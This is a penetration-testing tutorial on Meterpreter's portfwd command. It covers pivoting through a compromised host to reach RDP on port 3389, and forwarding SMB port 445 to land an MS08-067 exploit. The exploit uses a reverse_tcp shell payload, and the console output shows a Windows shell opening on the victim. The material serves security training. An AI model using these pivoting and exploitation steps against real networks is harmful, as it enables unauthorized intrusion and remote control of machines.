The portfwd command from within the Meterpreter shell is most commonly used as a pivoting technique, allowing direct access to machines otherwise inaccessible from the attacking system. Running this command on a compromised host with access to both the attacker and destination network (or system), we can essentially forward TCP connections through this machine, effectively making it a pivot point. Much like the port forwarding technique used with an ssh connection, portfwd will relay TCP connections to and from the connected machines.

From an active Meterpreter session, typing portfwd –h will display the command’s various options and arguments.

Figure 1 Help Banner

  • -L: Use to specify the listening host. Unless you need the forwarding to occur on a specific network adapter you can omit this option. If none is entered will be used.
  • -h: Displays the above information.
  • -l: This is a local port which will listen on the attacking machine. Connections to this port will be forwarded to the remote system.
  • -p: The port to which TCP connections will be forward to.
  • -r: The IP address the connections are relayed to (target).
  • Add: This argument is used to create the forwarding.
  • Delete: This will delete a previous entry from our list of forwarded ports.
  • List: This will list all ports currently forwarded.
  • Flush: This will delete all ports from our forwarding list.

From the Meterpreter shell, the command is used in the following manner:

meterpreter > portfwd add –l 3389 –p 3389 –r  [target host]

  • add will add the port forwarding to the list and will essentially create a tunnel for us. Please note, this tunnel will also exist outside the Metasploit console, making it available to any terminal session.
  • -l 3389 is the local port that will be listening and forwarded to our target. This can be any port on your machine, as long as it’s not already being used.
  • -p 3389 is the destination port on our targeting host.
  • -r [target host] is the our targeted system’s IP or hostname.
meterpreter > portfwd add –l 3389 –p 3389 –r
[*] Local TCP relay created: >->
meterpreter >

Figure 2 Adding a port

Entries are deleted very much like the previous command. Once again from an active Meterpreter session, we would type the following:

meterpreter > portfwd delete –l 3389 –p 3389 –r [target host]

meterpreter > portfwd delete –l 3389 –p 3389 –r
[*] Successfully stopped TCP relay on
meterpreter >

Figure 3 Deleting a port

LIST: This argument needs no options and provides us with a list of currently listening and forwarded ports.

meterpreter > portfwd list

meterpreter > portfwd list
0: ->
1: ->
2: ->

3 total local port forwards.
meterpreter >

Figure 4 List command

FLUSH: This argument will allow us to remove all the local port forward at once.

meterpreter > portfwd flush

meterpreter > portfwd flush
[*] Successfully stopped TCP relay on
[*] Successfully stopped TCP relay on
[*] Successfully stopped TCP relay on
[*] Successfully flushed 3 rules
meterpreter > portfwd list

0 total local port forwards
meterpreter >

Figure 5 Flush command

Example Usage:

In this example, we will open a port on our local machine and have our Meterpreter session forward a connection to our victim on that same port. We’ll be using port 3389, which is the Windows default port for Remote Desktop connections.

Here are the players involved:

C:\> ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection 3:

   Connection-specific DNS Suffix . : localdomain
   IP Address.  .  .  .  .  .  .  .  .
   Subnet Mask.  .  . .  .  .  .  .  .
   Default Gateway. . .  .  .  .  .  .


Figure 6 Victim machine

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  :
Netmask     :

VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:aa:00:aa:00:aa
IP Address  :
Netmask     :

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:bb:00:bb:00:bb
IP Address  :
Netmask     :

Figure 7 Our Pivot machine

root@kali:~# ifconfig eth1
eth1     Link encap:Ethernet  HWaddr 0a:0b:0c:0d:0e:0f
         inet addr:  Bcast:  Mask:
         inet6 addr: fe80::20c:29ff:fed6:ab38/64 Scope:Link
         RX packets:1357685 errors:0 dropped:0 overruns:0 frame:0
         TX packets:823428 errors:0 dropped:0 overruns:0 carrier:0
         collisions:0 txqueuelen:1000
         RX bytes:318385612 (303.6 MiB)  TX bytes:133752114 (127.5 MiB)
         Interrupt:19 Base address:0x2000

root@kali:~# ping
PING ( 56(84) bytes of data.
64 bytes from icmp_req=1 ttl=128 time=240 ms
64 bytes from icmp_req=2 ttl=128 time=117 ms
64 bytes from icmp_req=3 ttl=128 time=119 ms
--- ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 117.759/159.378/240.587/57.430 ms


Figure 8 Attacker’s machine

First we setup the port forwarding on our pivot using the following command:

meterpreter > portfwd add –l 3389 –p 3389 –r

We verify that port 3389 is listening by issuing the netstat command from another terminal.

root@kali:~# netstat -antp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0    *               LISTEN      8397/sshd
tcp        0      0  *               LISTEN      2045/.ruby.bin
tcp6       0      0 :::22                   :::*                    LISTEN      8397/sshd

Figure 9 Local machine’s listening ports

We can see is listening on port 3389 as well as the connection to our pivot machine on port 4444.

From here, we can initiate a remote desktop connection to our local 3389 port. Which will be forwarded to our victim machine on the corresponding port.

portfwd-rdesktop.png Figure 10 Remote Desktop connection using local port

Another example of portfwd usage is using it to forward exploit modules such as MS08-067. Using the same technique as show previously, it’s just a matter of forwarding the correct ports for the desired exploit.

Here we forwarded port 445, which is the port associated with Windows Server Message Block (SMB). Configuring our module target host and port to our forwarded socket. The exploit is sent via our pivot to the victim machine.

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST        yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LHOST    yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to
[-] Exploit exception: Stream # is closed.

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.


Figure 11 MS08-067 via Pivot